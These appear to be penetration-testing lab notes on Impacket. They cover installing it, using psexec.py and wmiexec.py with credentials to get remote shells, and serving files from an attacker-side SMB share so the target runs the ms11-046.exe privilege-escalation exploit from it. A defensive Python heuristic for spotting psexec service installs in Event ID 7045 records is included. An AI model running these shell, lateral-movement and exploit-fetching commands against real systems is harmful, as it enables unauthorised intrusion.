git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
# note: the SecureAuthCorp repository now redirects to https://github.com/fortra/impacket
cd /opt/tools/impacket/
python3 -m pip install .
pip3 install -r requirements.txt
#pip3 install .
#python3 setup.py install
# pip3 install --upgrade pip
psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host. From a detection standpoint this leaves two obvious artifacts: a new executable written to the ADMIN$ share (C:\Windows) and a service-install event (System log Event ID 7045, plus Security Event ID 4697 where service-install auditing is enabled) for a randomly named service running as LocalSystem.
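Added example (not part of the original notes): a small heuristic scanner for the artifacts psexec.py leaves behind, run over constructed Event ID 7045 (service installed) records. The pipe-delimited export format, the field order and the sample values are assumptions; the randomness test is a crude heuristic, so it is combined with the install location and start type rather than used alone.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
# Constructed 7045 export: ServiceName|ImagePath|ServiceType|StartType|Account
# (an assumed pipe-delimited format, not a native Windows log format).
SAMPLE_EVENTS = [
    "Spooler|C:\\Windows\\System32\\spoolsv.exe|user mode service|auto start|LocalSystem",
    "Sysmon64|C:\\Windows\\Sysmon64.exe|user mode service|auto start|LocalSystem",
    "vmtools|\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"|user mode service|auto start|LocalSystem",
    "VKEQHZSD|%SystemRoot%\\MHXTQLRP.exe|user mode service|demand start|LocalSystem",
]
# Binary sitting directly in the Windows root, i.e. what a write to ADMIN$ produces.
WINDIR_ROOT = re.compile(r"^(?:%systemroot%|c:\\windows)\\([^\\]+)\.exe$", re.I)
ALPHA_TOKEN = re.compile(r"^[a-z]{6,10}$", re.I)


@dataclass
class Finding:
    service: str
    image: str
    reasons: List[str] = field(default_factory=list)


def looks_random(name: str) -> bool:
    """Crude check for generated names: all letters, and either no vowels
    at all or a run of four or more consonants (unlike real service names)."""
    if not ALPHA_TOKEN.match(name):
        return False
    return (re.search(r"[aeiou]", name, re.I) is None
            or re.search(r"[^aeiou]{4,}", name, re.I) is not None)


def score_event(line: str) -> Optional[Finding]:
    """Return a Finding when at least two psexec.py-style indicators coincide."""
    fields = line.strip().split("|")
    if len(fields) != 5:
        return None
    svc, image, _stype, start, account = fields
    reasons = []
    m = WINDIR_ROOT.match(image.strip().strip('"'))
    if m:
        reasons.append("binary dropped directly into %SystemRoot% (ADMIN$)")
        if looks_random(m.group(1)):
            reasons.append("random-looking executable name")
    if looks_random(svc):
        reasons.append("random-looking service name")
    if account.lower() == "localsystem" and start.lower().startswith("demand"):
        reasons.append("demand-start service running as LocalSystem")
    return Finding(svc, image, reasons) if len(reasons) >= 2 else None


def scan(lines) -> List[Finding]:
    return [f for f in (score_event(l) for l in lines) if f is not None]
```

Only the last constructed record trips the threshold; a legitimately installed binary in the Windows root (Sysmon64) scores a single indicator and is left alone.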
/opt/tools/impacket/examples/psexec.py $DOMAIN/$USER:$PASS@$IP
# e.g. /opt/tools/impacket/examples/psexec.py inlanefreight.local/wley:'<PASSWORD>'@<TARGET_IP>
wmiexec.py provides a semi-interactive shell in which commands are executed through Windows Management Instrumentation. It does not drop any files or executables on the target host and generates fewer logs than other modules. After connecting, it runs as the local admin user we connected with (this can be less obvious to someone hunting for an intrusion than seeing SYSTEM executing many commands). This is a stealthier approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems. We will use the same account as with psexec.py to access the host.
/opt/tools/impacket/examples/wmiexec.py $DOMAIN/$USER:$PASS@$IP
# e.g. /opt/tools/impacket/examples/wmiexec.py inlanefreight.local/wley:'<PASSWORD>'@<TARGET_IP>
smbserver.py - Samba local server
Setup SMB Server - Kali
/opt/tools/impacket/examples/smbserver.py public .
/opt/tools/impacket/examples/smbserver.py -smb2support public .
/opt/tools/impacket/examples/smbserver.py -smb2support -username admin -password password123 public .
# /opt/tools/impacket/examples/smbserver.py -smb2support -username 'thm' -password 'Passw0rd!' public .
# /opt/tools/impacket/examples/smbserver.py -smb2support -username 'htb-student' -password 'Academy_student_AD!' public .
# run from the target host, executing the tools straight from the Kali share:
//<KALI_IP>/public/ms11-046.exe
//<KALI_IP>/public/accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service\"